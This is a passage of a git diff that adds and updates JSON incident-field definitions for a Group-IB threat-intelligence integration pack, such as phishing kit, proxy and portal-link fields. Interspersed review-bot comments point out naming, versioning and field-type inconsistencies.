+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Email.json
@@ -0,0 +1,33 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Attacks Phishing Kit"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibphishingkitemail",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibphishingkitemail",
+ "isReadOnly": false,
+ "locked": false,
+ "name": "GIB Phishing Kit Email",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Attacks Phishing Kit"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Emails.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Emails.json
index 59844aacb1f2..cc9d69a0f90e 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Emails.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Emails.json
@@ -25,5 +25,10 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Brand Protection Phishing Kit"
+ ]
 }
\ No newline at end of file
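Review bot: The new GIB Phishing Kit Email field added in the first hunk here differs from the existing GIB Phishing Kit Emails field in the second hunk only by one letter and by the incident type it is attached to (GIB Attacks Phishing Kit versus GIB Brand Protection Phishing Kit), and the same pattern recurs with GIB Proxy Source / GIB Proxy Sources in the Proxy hunks further down. Names this close are easy to confuse when building layouts and mapper rules, so a line in the pack documentation stating which feed populates each would help whoever maintains the mapper. This file is also one of only two new fields in the batch (the other is GIB_Phishing_Sources) that omit the `"itemVersion": "1.4.2",` entry every other new field carries; if that key matters to the pack tooling it should be added here for consistency.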
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Hash.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Hash.json
index f5dc6b364323..abc724c41120 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Hash.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Hash.json
@@ -25,5 +25,10 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Brand Protection Phishing Kit"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Path.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Path.json
new file mode 100644
index 000000000000..4839a2f08405
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Path.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Attacks Phishing Group"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibphishingkitpath",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibphishingkitpath",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Phishing Kit Path",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Attacks Phishing Group"
+ ],
+ "threshold": 72,
+ "type": "url",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
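Review bot: GIB Phishing Kit Path is declared with `"type": "url"` in the second hunk here, whereas the other phishing attribute fields in this batch (GIB Phishing Domain Puny, GIB Phishing Registrar) use `"type": "shortText"`. If the url field type is rendered as a clickable link in the incident layout, the value is the location of a phishing kit on hosting the attacker controls, and an analyst clicking it would connect straight to that host from the SOC; storing it as `"type": "shortText",` or noting in the pack documentation that the field points at live phishing infrastructure avoids that. I cannot see from the diff whether the GIB Attacks Phishing Group layouts display this field, so please confirm the rendering before changing the type.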
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Source.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Source.json
new file mode 100644
index 000000000000..7db1c19b8fa4
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Source.json
@@ -0,0 +1,36 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Attacks Phishing Kit",
+ "GIB Attacks Phishing Group"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibphishingkitsource",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibphishingkitsource",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Phishing Kit Source",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Attacks Phishing Kit",
+ "GIB Attacks Phishing Group"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Table.json
new file mode 100644
index 000000000000..62dfcf7963cc
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Kit_Table.json
@@ -0,0 +1,70 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Attacks Phishing Group"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibphishingkittable",
+ "closeForm": true,
+ "columns": [
+ {
+ "displayName": "Name",
+ "fieldCalcScript": "",
+ "isDefault": true,
+ "isReadOnly": false,
+ "key": "name",
+ "orgType": "shortText",
+ "required": false,
+ "script": "",
+ "selectValues": null,
+ "type": "shortText",
+ "width": 280
+ },
+ {
+ "displayName": "Email",
+ "fieldCalcScript": "",
+ "isDefault": true,
+ "isReadOnly": false,
+ "key": "email",
+ "orgType": "shortText",
+ "required": false,
+ "script": "",
+ "selectValues": null,
+ "type": "shortText",
+ "width": 150
+ }
+ ],
+ "content": true,
+ "defaultRows": [
+ {},
+ {},
+ {}
+ ],
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibphishingkittable",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Phishing Kit Table",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "propagationLabels": [
+ "all"
+ ],
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Attacks Phishing Group"
+ ],
+ "threshold": 72,
+ "type": "grid",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Objectives.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Objectives.json
new file mode 100644
index 000000000000..2313a2f95c4c
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Objectives.json
@@ -0,0 +1,37 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Attacks Phishing Group"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibphishingobjectives",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibphishingobjectives",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Phishing Objectives",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "propagationLabels": [
+ "all"
+ ],
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Attacks Phishing Group"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Registrar.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Registrar.json
new file mode 100644
index 000000000000..4cb24e1cb9f5
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Registrar.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Attacks Phishing Group"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibphishingregistrar",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibphishingregistrar",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Phishing Registrar",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Attacks Phishing Group"
+ ],
+ "threshold": 72,
+ "type": "shortText",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Sources.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Sources.json
new file mode 100644
index 000000000000..465b542b2409
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Sources.json
@@ -0,0 +1,36 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Attacks Phishing Group"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibphishingsources",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibphishingsources",
+ "isReadOnly": false,
+ "locked": false,
+ "name": "GIB Phishing Sources",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "propagationLabels": [
+ "all"
+ ],
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Attacks Phishing Group"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Status.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Status.json
index f9f378d49957..9f68e6621e9b 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Status.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Status.json
@@ -26,5 +26,11 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Brand Protection Phishing",
+ "GIB Brand Protection Domain"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Type.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Type.json
index 6ce42f301424..6ddc7011f324 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Type.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_Type.json
@@ -25,5 +25,10 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Brand Protection Domain"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_URLs.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_URLs.json
new file mode 100644
index 000000000000..a7819376b33e
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Phishing_URLs.json
@@ -0,0 +1,37 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Attacks Phishing Group"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibphishingurls",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibphishingurls",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Phishing URLs",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "propagationLabels": [
+ "all"
+ ],
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Attacks Phishing Group"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Portal_Link.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Portal_Link.json
index 1e9661cd59c9..81197ebb9757 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Portal_Link.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Portal_Link.json
@@ -7,7 +7,26 @@
 "GIB Compromised Card",
 "GIB OSI Git Leak",
 "GIB Targeted Malware",
- "GIB OSI Public Leak"
+ "GIB OSI Public Leak",
+ "GIB Attacks Deface",
+ "GIB Suspicious IP TOR Node",
+ "GIB Suspicious IP Open Proxy",
+ "GIB Suspicious IP VPN",
+ "GIB Suspicious IP Scanner",
+ "GIB Malware",
+ "GIB Suspicious IP Socks Proxy",
+ "GIB Compromised Account Group",
+ "GIB Compromised Card Group",
+ "GIB Compromised Mule",
+ "GIB Data Breach",
+ "GIB Attacks DDOS",
+ "GIB Attacks Phishing Kit",
+ "GIB Attacks Phishing Group",
+ "GIB Cybercriminal Threat",
+ "GIB Cybercriminal Threat Actor",
+ "GIB Nation-State Cybercriminals Threat Actor",
+ "GIB Nation-State Cybercriminals Threat",
+ "GIB OSI Vulnerability"
 ],
 "caseInsensitive": true,
 "cliName": "gibportallink",
@@ -31,5 +50,35 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Brand Protection Phishing",
+ "GIB Brand Protection Phishing Kit",
+ "GIB Compromised Account",
+ "GIB Compromised Card",
+ "GIB OSI Git Leak",
+ "GIB Targeted Malware",
+ "GIB OSI Public Leak",
+ "GIB Attacks Deface",
+ "GIB Suspicious IP TOR Node",
+ "GIB Suspicious IP Open Proxy",
+ "GIB Suspicious IP VPN",
+ "GIB Suspicious IP Scanner",
+ "GIB Malware",
+ "GIB Suspicious IP Socks Proxy",
+ "GIB Compromised Account Group",
+ "GIB Compromised Card Group",
+ "GIB Compromised Mule",
+ "GIB Data Breach",
+ "GIB Attacks DDOS",
+ "GIB Attacks Phishing Kit",
+ "GIB Attacks Phishing Group",
+ "GIB Cybercriminal Threat",
+ "GIB Cybercriminal Threat Actor",
+ "GIB Nation-State Cybercriminals Threat Actor",
+ "GIB Nation-State Cybercriminals Threat",
+ "GIB OSI Vulnerability"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Provider_Domain.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Provider_Domain.json
new file mode 100644
index 000000000000..6e3dff7f6591
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Provider_Domain.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Attacks Deface"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibproviderdomain",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibproviderdomain",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Provider Domain",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Attacks Deface"
+ ],
+ "threshold": 72,
+ "type": "shortText",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Port.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Port.json
new file mode 100644
index 000000000000..8dcd697c0787
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Port.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Suspicious IP Open Proxy"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibproxyport",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibproxyport",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Proxy Port",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Suspicious IP Open Proxy"
+ ],
+ "threshold": 72,
+ "type": "number",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Source.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Source.json
new file mode 100644
index 000000000000..20f1d669a04a
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Source.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Suspicious IP Open Proxy"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibproxysource",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibproxysource",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Proxy Source",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Suspicious IP Open Proxy"
+ ],
+ "threshold": 72,
+ "type": "shortText",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Sources.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Sources.json
new file mode 100644
index 000000000000..b5b3000e0ccb
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Sources.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Suspicious IP Open Proxy"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibproxysources",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibproxysources",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Proxy Sources",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Suspicious IP Open Proxy"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Type.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Type.json
new file mode 100644
index 000000000000..f6132ee72458
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Proxy_Type.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Suspicious IP Open Proxy"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibproxytype",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibproxytype",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Proxy Type",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Suspicious IP Open Proxy"
+ ],
+ "threshold": 72,
+ "type": "shortText",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Related_Indicators_Data.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Related_Indicators_Data.json
index 1d7cc044aff4..53a66e66c30f 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Related_Indicators_Data.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Related_Indicators_Data.json
@@ -6,7 +6,31 @@
 "GIB Compromised Account",
 "GIB Compromised Card",
 "GIB Targeted Malware",
- "GIB Brand Protection Domain"
+ "GIB Brand Protection Domain",
+ "GIB Compromised Account Group",
+ "GIB Compromised Card Group",
+ "GIB Compromised Mule",
+ "GIB OSI Vulnerability",
+ "GIB Attacks DDOS",
+ "GIB Attacks Deface",
+ "GIB Attacks Phishing Group",
+ "GIB Attacks Phishing Kit",
+ "GIB Suspicious IP TOR Node",
+ "GIB Suspicious IP Open Proxy",
+ "GIB Suspicious IP VPN",
+ "GIB Suspicious IP Scanner",
+ "GIB Malware CNC",
+ "GIB Cybercriminal Threat",
+ "GIB Suspicious IP Socks Proxy",
+ "GIB Nation-State Cybercriminals Threat",
+ "GIB Cybercriminal Threat Actor",
+ "GIB Malware CNC copy",
+ "GIB APT Threat",
+ "GIB Data Breach",
+ "GIB Malware",
+ "GIB Nation-State Cybercriminals Threat Actor",
+ "GIB OSI Git Leak",
+ "GIB OSI Public Leak"
 ],
 "caseInsensitive": true,
 "cliName": "gibrelatedindicatorsdata",
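Review bot: The associatedTypes list added in this hunk contains `"GIB Malware CNC copy"`, which reads like a duplicated incident type left behind by the XSOAR UI rather than a real type, and the same entry is repeated in the systemAssociatedTypes list of the next hunk; if no incident type with exactly that name ships in the pack, both entries should be removed, and if one does, it should be renamed before it reaches users. Separately, this list carries `"GIB Malware CNC"` and `"GIB APT Threat"` while the GIB_Portal_Link lists in the earlier hunk do not; that may be intentional, but the two fields otherwise cover the same set of types, so it is worth a check.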
@@ -30,5 +54,39 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Brand Protection Phishing",
+ "GIB Brand Protection Phishing Kit",
+ "GIB Compromised Account",
+ "GIB Compromised Card",
+ "GIB Targeted Malware",
+ "GIB Brand Protection Domain",
+ "GIB Compromised Account Group",
+ "GIB Compromised Card Group",
+ "GIB Compromised Mule",
+ "GIB OSI Vulnerability",
+ "GIB Attacks DDOS",
+ "GIB Attacks Deface",
+ "GIB Attacks Phishing Group",
+ "GIB Attacks Phishing Kit",
+ "GIB Suspicious IP TOR Node",
+ "GIB Suspicious IP Open Proxy",
+ "GIB Suspicious IP VPN",
+ "GIB Suspicious IP Scanner",
+ "GIB Malware CNC",
+ "GIB Cybercriminal Threat",
+ "GIB Suspicious IP Socks Proxy",
+ "GIB Nation-State Cybercriminals Threat",
+ "GIB Cybercriminal Threat Actor",
+ "GIB Malware CNC copy",
+ "GIB APT Threat",
+ "GIB Data Breach",
+ "GIB Malware",
+ "GIB Nation-State Cybercriminals Threat Actor",
+ "GIB OSI Git Leak",
+ "GIB OSI Public Leak"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Reliability.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Reliability.json
index 9af8866046ec..4b502181bce1 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Reliability.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Reliability.json
@@ -8,7 +8,22 @@
 "GIB Data Breach",
 "GIB OSI Git Leak",
 "GIB OSI Public Leak",
- "GIB Targeted Malware"
+ "GIB Targeted Malware",
+ "GIB Compromised Account Group",
+ "GIB Compromised Card Group",
+ "GIB Compromised Mule",
+ "GIB OSI Vulnerability",
+ "GIB Attacks DDOS",
+ "GIB Attacks Deface",
+ "GIB Attacks Phishing Group",
+ "GIB Attacks Phishing Kit",
+ "GIB Suspicious IP TOR Node",
+ "GIB Suspicious IP Open Proxy",
+ "GIB Suspicious IP VPN",
+ "GIB Suspicious IP Scanner",
+ "GIB Cybercriminal Threat",
+ "GIB Suspicious IP Socks Proxy",
+ "GIB Nation-State Cybercriminals Threat"
 ],
 "caseInsensitive": true,
 "cliName": "gibreliability",
@@ -33,5 +48,32 @@
 "unsearchable": true,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
-}
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Brand Protection Phishing",
+ "GIB Brand Protection Phishing Kit",
+ "GIB Compromised Account",
+ "GIB Compromised Card",
+ "GIB Data Breach",
+ "GIB OSI Git Leak",
+ "GIB OSI Public Leak",
+ "GIB Targeted Malware",
+ "GIB Compromised Account Group",
+ "GIB Compromised Card Group",
+ "GIB Compromised Mule",
+ "GIB OSI Vulnerability",
+ "GIB Attacks DDOS",
+ "GIB Attacks Deface",
+ "GIB Attacks Phishing Group",
+ "GIB Attacks Phishing Kit",
+ "GIB Suspicious IP TOR Node",
+ "GIB Suspicious IP Open Proxy",
+ "GIB Suspicious IP VPN",
+ "GIB Suspicious IP Scanner",
+ "GIB Cybercriminal Threat",
+ "GIB Suspicious IP Socks Proxy",
+ "GIB Nation-State Cybercriminals Threat"
+ ]
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Report_Number.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Report_Number.json
new file mode 100644
index 000000000000..8788bf171d6f
